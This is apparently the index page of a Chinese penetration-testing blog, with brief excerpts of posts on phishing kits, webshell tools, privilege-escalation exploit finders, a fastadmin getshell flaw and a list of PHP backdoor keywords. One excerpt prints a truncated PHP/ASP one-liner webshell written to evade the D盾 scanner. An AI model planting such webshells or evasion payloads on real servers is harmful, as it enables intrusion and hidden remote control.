XSS打击钓鱼网站

小俊 | 渗透测试 | 2020-10-05
朋友发来一个钓鱼站,抓包+xss即可绕过。 过程如下:   QQ号码处输入处输入正常号码,密码处输入payload,正常输入会有字符长度限制,burp抓包绕过一下就行。 成功拿下。 只做技术研究,误做非法操作。 [阅读全文]
ė168次浏览 60条评论 0

水坑攻击-Flash钓鱼弹窗优化版源码下载

小俊 | 渗透测试 | 2020-10-04
一直想写个界面精致点的Flash钓鱼,奈何各种效果实现起来实在是有点麻烦,正好发现了layer这个牛逼的弹层组件,一开始直接用的图片,几行代码就搞定了,但是还是不够完美,后来发到T00ls大家集思广益,提出了一些非常好的建议,几次修改后才有了如下的最终版。 在线预览:http://flash-pop.se7ensec.cn/ 有人说flas [阅读全文]
ė120次浏览 60条评论 0

冰蝎3.0测试版下载

小俊 | 各种神器 | 2020-10-04
   在值班的我即将睡着,突然之间微信群炸了,冰蝎3.0发布!虽然是测试版,但是通过作者的对3.0版本的介绍,我们不难看出作者对本次更新的内容算是一个大更新了!   首先我们看一下界面UI的改动:   UI框架由awt改为javafx!与之前相比看着更顺眼更好看了有木有~ [阅读全文]
ė168次浏览 60条评论 0

Windows提权漏洞库+EXP/POC工具

小俊 | 各种神器 | 2020-10-04
然后在cmd输入systeminfo命令获取到: 输入软件里边然后点击文本处理: 点击判断: hash值: 文件名称: D:\编程\提权漏洞搜索.exe 文件大小: 18.0 MB (18,882,560 字节) 文件版本 [阅读全文]
ė162次浏览 60条评论 0

渗透测试辅助神器-Hcaking Search Box 5.0

小俊 | 各种神器 | 2020-10-04
更新内容: 1.修复fofa api搜索功能结果重复问题。 2.新增fofa api历史搜索关键词功能。 3.新增批量网站cms系统识别功能。 4.新增一键文本编码解码功能。 FOFA API历史搜索功能: 自动保存历史搜索记录,搜索关键词记录文件在运行目录的config下的“keyw [阅读全文]
ė144次浏览 60条评论 0

一次对大马的简单分析产生的深思

小俊 | 渗透测试 | 2020-10-03
以下文章来源于t00ls 日常网络冲浪的时候接到任务,拿下目标服务器getshell了以后,发现了个奇怪的php文件,文件比较大,有200k,怀着好奇的心理,便访问了一下。 不失所望,是个大马,本着好奇心下载了下来,尝试爆破,爆破成功 功能还算是齐全,正打算收入囊中,一想到上次xxx事件,心有余悸。。 查看 [阅读全文]
ė123次浏览 60条评论 0

fastadmin前台getshell漏洞

小俊 | WEB漏洞大全 | 2020-10-02
影响版本 V1.0.0.20200506_beta(最新版) 利用限制 /application/config.php 文件中: //是否开启前台会员中心 'usercenter' => true, 即需要开启会员中心功能 漏洞分析 /application/index/User.php文件 第5 [阅读全文]
ė245次浏览 60条评论 0

常见的后门关键词

小俊 | 渗透测试 | 2020-10-02
分享给那些安服的苦逼们: 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 文件包含: require, requi [阅读全文]
ė141次浏览 60条评论 0

免杀D盾的PHP/ASP/ASPX一句话

小俊 | 渗透测试 | 2020-10-02
php: $m=$_GET[ $m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c); ($a.$b); ?> asp: <% P=request("pass") A=mid(P,1,1 [阅读全文]
ė135次浏览 60条评论 0

jsp大马-支持jdk5-通信加密过waf

小俊 | 各种神器 | 2020-10-02
很不巧在实战中遇到jdk5的java站,本来jspspy可以用,结果jspspy通信数据没有任何加密处理,在waf目前废了 蚁剑、冰蝎是不支持jdk5的 目前功能不完善,只满足了我当时透站时的需求,功能大概如下 文件浏览,删除、剪切、复制、压缩、解压、新建文件、目录,搜索文件,上传文件,批量操作文件 在线shell 良好的界面外观 通信数据加密 [阅读全文]
ė118次浏览 60条评论 0

Ɣ回顶部